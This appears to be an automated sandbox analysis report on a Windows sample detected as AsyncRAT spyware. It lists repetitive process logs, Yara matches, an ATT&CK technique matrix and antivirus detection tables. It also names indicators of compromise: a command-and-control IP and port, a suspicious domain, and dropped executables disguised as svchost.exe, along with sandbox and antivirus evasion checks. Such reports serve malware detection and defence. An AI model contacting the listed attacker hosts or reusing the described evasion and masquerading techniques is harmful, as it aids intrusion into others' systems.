Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeCode function: 4_2_00007FF6BA6576D8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF6BA6576D8
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: svchost.exe, 00000003.00000002.2785488992.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2799077131.000000001BEAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

Source: Yara match | File source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: All function.exe PID: 4400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 512, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                  Remote Access Functionality

Source: Yara match | File source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: All function.exe PID: 4400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 512, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
ATT&CK matrix (techniques listed per tactic column; the digits preceding a technique name are that matrix cell's signature-count badges, kept as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 151 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 1 File and Directory Discovery; 24 System Information Discovery; 541 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 12 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1583457 | Sample: file.exe | Start date: 02/01/2025 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: ip-api.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures
  Started: file.exe; svchost.exe; svchost.exe

file.exe
  Dropped: C:\Users\user\AppData\Roaming\svchost.exe (PE32); C:\Users\user\AppData\...\All function.exe (PE32); C:\Users\user\AppData\Local\...\file.exe.log (CSV)
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops PE files with benign system names
  Started: svchost.exe; All function.exe

svchost.exe (started by file.exe)
  DNS/IP: 45.141.26.134, 54562, 7000, SPECTRAIPSpectraIPBVNL, Netherlands; ip-api.com 208.95.112.1, 49702, 80, TUT-ASUS, United States
  Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 7 other signatures
  Started: powershell.exe; powershell.exe; powershell.exe; 2 other processes

All function.exe
  Dropped: C:\Users\user\AppData\...\ALL slumzick.exe (PE32+)
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  Started: svchost.exe; ALL slumzick.exe

powershell.exe (first instance)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe

powershell.exe (second instance): started conhost.exe
powershell.exe (third instance): started conhost.exe
2 other processes (started by svchost.exe): started conhost.exe; conhost.exe

Source | Detection | Scanner | Label
file.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
file.exe | 100% | Avira | TR/Dropper.Gen
file.exe | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\All function.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\ALL slumzick.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\All function.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\ALL slumzick.exe | 47% | ReversingLabs | Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\All function.exe | 83% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Roaming\svchost.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
45.141.26.134 | 0% | Avira URL Cloud | safe
https://qualityboy.rdcw.xyz/ | 0% | Avira URL Cloud | safe
https://ion=v4.5alC | 0% | Avira URL Cloud | safe
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad | 0% | Avira URL Cloud | safe
http://www.microsu.S | 0% | Avira URL Cloud | safe
https://scripts.sil.org/OFLThis | 0% | Avira URL Cloud | safe
https://qualityboy.rdcw.xyz/slumzickx | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | Active: true | Malicious: false | Reputation: high

Name | Malicious | Antivirus Detection | Reputation
45.141.26.134 | Malicious: true | Avira URL Cloud: safe | Reputation: unknown
http://ip-api.com/line/?fields=hosting | Malicious: false | Reputation: high
Name | Source | Malicious | Antivirus Detection | Reputation
